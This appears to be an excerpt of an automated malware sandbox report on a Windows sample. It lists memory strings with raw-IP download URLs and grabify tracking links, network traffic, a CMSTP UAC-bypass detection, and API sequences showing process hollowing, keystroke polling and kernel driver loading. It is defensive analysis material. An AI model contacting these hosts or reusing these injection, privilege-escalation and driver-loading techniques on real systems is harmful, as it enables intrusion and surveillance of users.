                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1_
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1c
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1o
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.28.10/003/01/d1x
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/clean
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2445459264.000000E655D76000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/data/003
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                    Source: powershell.exe, 00000013.00000002.1484701780.00000201C4912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: tzutil.exe, 0000000F.00000003.1457083520.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp, K47ZW3T_7928.sys.15.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B4AC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D9017F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B4AC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000015.00000002.1575045533.000001D919F5C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1574238992.000001D919E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000013.00000002.1451660217.00000201B48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1508687218.000001D9017F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: tzutil.exe, tzutil.exe, 0000000F.00000002.1476857053.0000000140010000.00000004.00000001.01000000.00000007.sdmp, tzutil.exe, 0000000F.00000002.1475891130.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000012.00000002.1503322850.0000000140075000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: tzutil.exe, w32tm.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                    Source: w32tm.exe, 00000012.00000003.1478137297.000000000044C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-l
                    Source: w32tm.exe, 00000012.00000003.1478137297.000000000044C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-l)ky
                    Source: w32tm.exe, 00000012.00000003.1455611296.0000000002539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/fu
                    Source: w32tm.exe, 00000012.00000002.1503322850.0000000140075000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
                    Source: w32tm.exe, 00000012.00000003.1460867803.0000000002521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe/q
                    Source: w32tm.exe, 00000012.00000003.1460867803.0000000002521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exed
                    Source: w32tm.exe, 00000012.00000002.1502716547.0000000002520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exeindows
                    Source: powershell.exe, 00000015.00000002.1508687218.000001D901A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000013.00000002.1492884123.00000201CCC23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                    Source: tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/U7WLGD
                    Source: UZPt0hR.exe, 00000000.00000002.1217110910.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4D3000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447224015.000002684AABE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2447729139.000002684C4CF000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2446684624.000002684AA64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/ZATFQO
                    Source: svchost.exe, 00000005.00000002.2446834017.000002684AA82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/images/pixel.png
                    Source: powershell.exe, 00000013.00000002.1484701780.00000201C4912000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1562304976.000001D911861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:49695 version: TLS 1.2
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C482310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,5_2_000002684C482310

                    System Summary

                    barindex
                    Source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00411449 NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,0_2_00411449
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00491A07 CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,0_2_00491A07
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00411600 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,0_2_00411600
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00411AE0 CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,0_2_00411AE0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00406DB0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4811A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,5_2_000002684C4811A4
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C480740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle,5_2_000002684C480740
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C477940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess,5_2_000002684C477940
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,15_2_007D5D7C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,15_2_007D5D7C
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\K47ZW3T_7928.sysJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile deleted: C:\Windows\Temp\K47ZW3T_7928.sysJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0040E1C80_2_0040E1C8
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004258F70_2_004258F7
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4923405_2_000002684C492340
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C489D205_2_000002684C489D20
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C474DA05_2_000002684C474DA0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C495E505_2_000002684C495E50
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48D6005_2_000002684C48D600
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C477EF05_2_000002684C477EF0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4710005_2_000002684C471000
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49E9BC5_2_000002684C49E9BC
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4812B05_2_000002684C4812B0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4A3B2C5_2_000002684C4A3B2C
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4923B65_2_000002684C4923B6
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C49CC2C5_2_000002684C49CC2C
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4A5C5C5_2_000002684C4A5C5C
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C47CBF05_2_000002684C47CBF0
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C4A53F85_2_000002684C4A53F8
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48C4805_2_000002684C48C480
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48AD505_2_000002684C48AD50
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48C5015_2_000002684C48C501
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C48A5105_2_000002684C48A510
